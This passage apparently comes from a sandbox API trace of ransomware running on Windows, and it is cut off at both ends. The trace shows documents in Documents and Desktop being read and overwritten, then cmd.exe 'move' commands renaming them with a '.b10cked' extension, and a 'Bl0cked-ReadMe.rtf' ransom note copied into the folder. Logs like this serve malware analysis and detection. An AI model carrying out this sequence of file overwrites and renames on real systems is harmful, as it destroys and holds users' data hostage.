lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.471] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.471] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x18468 [0137.471] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.471] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.471] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x18468 [0137.471] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.471] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.471] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x18468 [0137.471] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.471] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.471] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x18468 [0137.471] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.471] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.471] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x18468 [0137.471] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.471] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x17f80 [0137.471] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0137.472] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0137.472] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0137.472] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x18468 [0137.472] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0137.472] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0137.472] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0137.472] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x18468 [0137.472] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0137.473] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0137.473] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xc233, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xc233, lpOverlapped=0x0) returned 1 [0137.473] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0137.473] WriteFile (in: hFile=0x114, lpBuffer=0x12594a8*, nNumberOfBytesToWrite=0xc233, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12594a8*, lpNumberOfBytesWritten=0x12ec1c*=0xc233, lpOverlapped=0x0) returned 1 [0137.473] SetFilePointer (in: hFile=0x114, lDistanceToMove=-49715, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xc235 [0137.474] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xc233, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xc233, lpOverlapped=0x0) returned 1 [0137.474] SetFilePointer (in: hFile=0x114, lDistanceToMove=-49715, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xc235 [0137.474] WriteFile (in: hFile=0x114, lpBuffer=0x12594a8*, nNumberOfBytesToWrite=0xc233, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12594a8*, lpNumberOfBytesWritten=0x12ec1c*=0xc233, lpOverlapped=0x0) returned 1 [0137.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BmSmSSu.doc", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0137.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BmSmSSu.doc", cchWideChar=11, lpMultiByteStr=0x131326c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BmSmSSu.doc", lpUsedDefaultChar=0x0) returned 11 [0137.478] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x18468 [0137.478] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0137.478] CloseHandle (hObject=0x114) returned 1 [0137.479] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\BmSmSSu.doc", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc") returned 0x25 [0137.480] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0137.480] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0x12c, dwThreadId=0x128)) returned 1 [0137.498] CloseHandle (hObject=0x110) returned 1 [0137.498] CloseHandle (hObject=0x114) returned 1 [0137.498] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0137.498] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", cchLength=0x29 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\") returned 0x29 [0137.498] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\", cchCount2=41) returned 1 [0137.498] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0137.498] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0137.498] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0137.498] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0137.498] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0137.498] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0137.498] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0137.499] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0137.499] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0137.499] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0x738, dwThreadId=0x4d4)) returned 1 [0137.504] CloseHandle (hObject=0x110) returned 1 [0137.504] CloseHandle (hObject=0x114) returned 1 [0137.504] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\bl0cked-readme.rtf")) returned 0x20 [0137.504] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0137.504] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0137.504] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0137.504] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.504] ReleaseMutex (hMutex=0xf8) returned 1 [0137.504] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.504] ReleaseMutex (hMutex=0xf8) returned 1 [0137.504] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.504] ReleaseMutex (hMutex=0xf8) returned 1 [0137.504] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.504] ReleaseMutex (hMutex=0xf8) returned 1 [0137.504] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\pWkwXr56WJA6 l5.ods" (normalized: "c:\\users\\eebsym5\\desktop\\pwkwxr56wja6 l5.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0137.505] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.505] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x116d4 [0137.505] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.505] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19429391944) returned 1 [0137.505] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.505] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x116d4 [0137.505] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.505] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.505] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x116d4 [0137.505] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.505] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0137.505] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x116d4 [0137.505] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0137.505] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.505] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x116d4 [0137.505] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.505] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.505] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x116d4 [0137.505] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.505] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.506] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x116d4 [0137.506] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.506] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.506] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x116d4 [0137.506] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.506] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.506] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x116d4 [0137.506] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.506] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.506] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x116d4 [0137.506] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.506] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x111ec [0137.506] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0137.507] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0137.507] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0137.507] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x116d4 [0137.507] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0137.507] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0137.507] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0137.536] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x116d4 [0137.536] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0137.536] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0137.536] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x8b69, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x8b69, lpOverlapped=0x0) returned 1 [0137.537] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0137.537] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x8b69, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x8b69, lpOverlapped=0x0) returned 1 [0137.537] SetFilePointer (in: hFile=0x114, lDistanceToMove=-35689, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x8b6b [0137.537] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x8b69, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x8b69, lpOverlapped=0x0) returned 1 [0137.537] SetFilePointer (in: hFile=0x114, lDistanceToMove=-35689, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x8b6b [0137.537] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x8b69, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x8b69, lpOverlapped=0x0) returned 1 [0137.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pWkwXr56WJA6 l5.ods", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0137.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pWkwXr56WJA6 l5.ods", cchWideChar=19, lpMultiByteStr=0x13286a4, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pWkwXr56WJA6 l5.ods", lpUsedDefaultChar=0x0) returned 19 [0137.541] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x116d4 [0137.541] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0137.541] CloseHandle (hObject=0x114) returned 1 [0137.542] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\pWkwXr56WJA6 l5.ods", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\PWKWXR~1.ODS") returned 0x25 [0137.543] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\") returned 0x19 [0137.543] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\PWKWXR~1.ODS\" \"C:\\Users\\EEBsYm5\\Desktop\\pWkwXr56WJA6 l5.ods.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), 